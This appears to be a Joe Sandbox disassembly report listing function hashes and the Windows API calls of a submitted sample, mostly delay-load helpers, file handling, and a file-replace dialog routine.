                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 15d8f0a51ddd88a18053bf7a7bfd3baab98c9e3d203b988c985ba3294646d062
                                          • Instruction ID: f2416d86446d762cd42add90c7216a4aad171de86eb3f9b2d597edb8510877c0
                                          • Opcode Fuzzy Hash: 15d8f0a51ddd88a18053bf7a7bfd3baab98c9e3d203b988c985ba3294646d062
                                          • Instruction Fuzzy Hash: 40B012E22680407C3504D1475D0AEB7030DC0C0B20330C42FF608C2081EC414C093873
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E580
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: f30b13e028441b3b630459553d6245d8f01f84289e3b77d83401700f6485fa38
                                          • Instruction ID: 17fbacfd0867d4b9f56e84caa714ed83b2240b65e93e1d6716f6dea04240d9ee
                                          • Opcode Fuzzy Hash: f30b13e028441b3b630459553d6245d8f01f84289e3b77d83401700f6485fa38
                                          • Instruction Fuzzy Hash: 74B012C26691407C3544D1965C0BE37021DC1C1B10335422FF408C20C2FC455C503872
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E580
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 96b4a5898636704c22b3a133a28c1360e98531b68dc85b07f0ae5fba5d9c4c86
                                          • Instruction ID: 4663f075aeb4b936dd7638c563d73a9327ab8142296cdd0464a636b5d89e8b2d
                                          • Opcode Fuzzy Hash: 96b4a5898636704c22b3a133a28c1360e98531b68dc85b07f0ae5fba5d9c4c86
                                          • Instruction Fuzzy Hash: 61B012C26690407C3504D1965D0AE37021DC1C1B10335422FF408C20C2FC465D113872
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E580
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 267f688bdb5d2fba90c03ae7a327b89bb3a04bd8ec506a17ba67fcab3d5fae13
                                          • Instruction ID: c04677f3e41dab102bd649f8d1529b4a090e46d3cdfc209fbc7bcf6ff112b5c1
                                          • Opcode Fuzzy Hash: 267f688bdb5d2fba90c03ae7a327b89bb3a04bd8ec506a17ba67fcab3d5fae13
                                          • Instruction Fuzzy Hash: 72B012C36680407D3504D1961C0AE37020DC1C0B10331406FF408C20C1FC454C103872
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E51F
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 502ef480697fa67f6c1f2eaf0093874faa117ae2a1672f753dd02096e7b8af5d
                                          • Instruction ID: 2b2c2787e9145b552082375b53aba7d04999371568348db749165fc5c4dff4c8
                                          • Opcode Fuzzy Hash: 502ef480697fa67f6c1f2eaf0093874faa117ae2a1672f753dd02096e7b8af5d
                                          • Instruction Fuzzy Hash: C8B012C22691407C3604E14A5C0BE7B020DC0C1F14330423EF448C1081FC409C443C72
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E51F
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 182b3aefd2fb1daea9607437ae0de1f81ef15d6aece1ed0d57b4a8ba283fdc9d
                                          • Instruction ID: f0cf95f1d2bf19eb28cd4c3d83365d113f74d567e9aab3223bc3e031d405e852
                                          • Opcode Fuzzy Hash: 182b3aefd2fb1daea9607437ae0de1f81ef15d6aece1ed0d57b4a8ba283fdc9d
                                          • Instruction Fuzzy Hash: D6B012C32680407D3504D14A1C0AF7B020DC0C1F14330407EF448C1081FC408D003C72
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E51F
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: c77d70e12e22ca90f411958f50a744b61e814cbd667e7df040300e7ddb59ad6a
                                          • Instruction ID: 50701de48e616a155b049cb5965c353ef7a0105511073147da4c28bbd5938bc6
                                          • Opcode Fuzzy Hash: c77d70e12e22ca90f411958f50a744b61e814cbd667e7df040300e7ddb59ad6a
                                          • Instruction Fuzzy Hash: F7B012C22680807C3504D14A1D0AE7B060DC0C1F24330803EF548C1081FC418C013C72
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E51F
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 322e09d81ce1321fc7803149812d7fd4247d14ad1871e6a3eb19a40af1767a47
                                          • Instruction ID: 082d1889c15e60737bc6b53c91a10ed9d930804600b20e49536bc9c4b4749d21
                                          • Opcode Fuzzy Hash: 322e09d81ce1321fc7803149812d7fd4247d14ad1871e6a3eb19a40af1767a47
                                          • Instruction Fuzzy Hash: 2EB012C22680407C350491661C0EE7B020DC0C1F14330407EF494C0496BC408E043C72
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: f4b26cc9bfbeed2aa0eb41fa81d2199c7a6d834987ee293d54030a5bbe00a100
                                          • Instruction ID: 99e3a42f000cc8648e000bfb492a5b2bd1acb24ad479090720ff70896029fa1b
                                          • Opcode Fuzzy Hash: f4b26cc9bfbeed2aa0eb41fa81d2199c7a6d834987ee293d54030a5bbe00a100
                                          • Instruction Fuzzy Hash: 70A001E62A9142BC3918A2926E06E7B121DC5C5B61334896EF856C8481AC95A8C938B2
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 365b4b2a4c8beca1d3ab5f865d5e6f3fec02fa1c23fb0b3c6cf37df4d1933a50
                                          • Instruction ID: 99e3a42f000cc8648e000bfb492a5b2bd1acb24ad479090720ff70896029fa1b
                                          • Opcode Fuzzy Hash: 365b4b2a4c8beca1d3ab5f865d5e6f3fec02fa1c23fb0b3c6cf37df4d1933a50
                                          • Instruction Fuzzy Hash: 70A001E62A9142BC3918A2926E06E7B121DC5C5B61334896EF856C8481AC95A8C938B2
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E3FC
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 984b4d692212d225516ee561657864c19351225a5969de100820854d8259cd2a
                                          • Instruction ID: 40f94ba22af81694572e534dd6766915bcb3d49d1236cf84867b7646ff8207d4
                                          • Opcode Fuzzy Hash: 984b4d692212d225516ee561657864c19351225a5969de100820854d8259cd2a
                                          • Instruction Fuzzy Hash: D9A011E22A80023C3808A283AC02EBB030EC0C0B20330882EF828A0080AC80080038B3
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E3FC
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: fc18922400f6550e1132f9c5b1e5e7ee74a5d633859192994919ea1c52e353f1
                                          • Instruction ID: a479b96bf35fe1c3b92d028b7808eac190779b7a7d9c28b3ad2fc6362bd2aef5
                                          • Opcode Fuzzy Hash: fc18922400f6550e1132f9c5b1e5e7ee74a5d633859192994919ea1c52e353f1
                                          • Instruction Fuzzy Hash: DFA011E22A8002BC3808A283AC02EBB030EC0C0B20330882EF80A80080AC80080038B3
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E3FC
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E580
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E51F
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          APIs
                                          • SetEndOfFile.KERNEL32(?,00F8903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00F89F0C
                                          Similarity
                                          • API ID: File
                                          • String ID:
                                          • API String ID: 749574446-0
                                          APIs
                                          • SetCurrentDirectoryW.KERNEL32(?,00F9AE72,C:\Users\user\Desktop,00000000,00FC946A,00000006), ref: 00F9AC08
                                          Similarity
                                          • API ID: CurrentDirectory
                                          • String ID:
                                          • API String ID: 1611563598-0
                                          APIs
                                          • CloseHandle.KERNEL32(000000FF,?,?,00F895D6,?,?,?,?,?,00FB2641,000000FF), ref: 00F8963B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          • Opcode ID: e54e0205218a2af39672fd2192e590da1dfd6941e5e1bc998d047f65fe37be54
                                          • Instruction ID: 34ed233b8d3693ea6d6492ad0dc6edbbafbb0350e84269a104fa7444b27f806d
                                          • Opcode Fuzzy Hash: e54e0205218a2af39672fd2192e590da1dfd6941e5e1bc998d047f65fe37be54
                                          • Instruction Fuzzy Hash: 3FF08970889B159FDB31AA24C458BE277E86B12335F081B1ED0F6429E0E7B1658DAB40
                                          APIs
                                            • Part of subcall function 00F81316: GetDlgItem.USER32(00000000,00003021), ref: 00F8135A
                                            • Part of subcall function 00F81316: SetWindowTextW.USER32(00000000,00FB35F4), ref: 00F81370
                                          • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00F9C2B1
                                          • EndDialog.USER32(?,00000006), ref: 00F9C2C4
                                          • GetDlgItem.USER32(?,0000006C), ref: 00F9C2E0
                                          • SetFocus.USER32(00000000), ref: 00F9C2E7
                                          • SetDlgItemTextW.USER32(?,00000065,?), ref: 00F9C321
                                          • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00F9C358
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00F9C36E
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F9C38C
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F9C39C
                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00F9C3B8
                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00F9C3D4
                                          • _swprintf.LIBCMT ref: 00F9C404
                                            • Part of subcall function 00F84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F840A5
                                          • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00F9C417
                                          • FindClose.KERNEL32(00000000), ref: 00F9C41E
                                          • _swprintf.LIBCMT ref: 00F9C477
                                          • SetDlgItemTextW.USER32(?,00000068,?), ref: 00F9C48A
                                          • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00F9C4A7
                                          • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00F9C4C7
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F9C4D7
                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00F9C4F1
                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00F9C509
                                          • _swprintf.LIBCMT ref: 00F9C535
                                          • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00F9C548
                                          • _swprintf.LIBCMT ref: 00F9C59C
                                          • SetDlgItemTextW.USER32(?,00000069,?), ref: 00F9C5AF
                                            • Part of subcall function 00F9AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00F9AF35
                                            • Part of subcall function 00F9AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00FBE72C,?,?,?,?,?,00000032), ref: 00F9AF84
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                          • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                          • API String ID: 797121971-1840816070
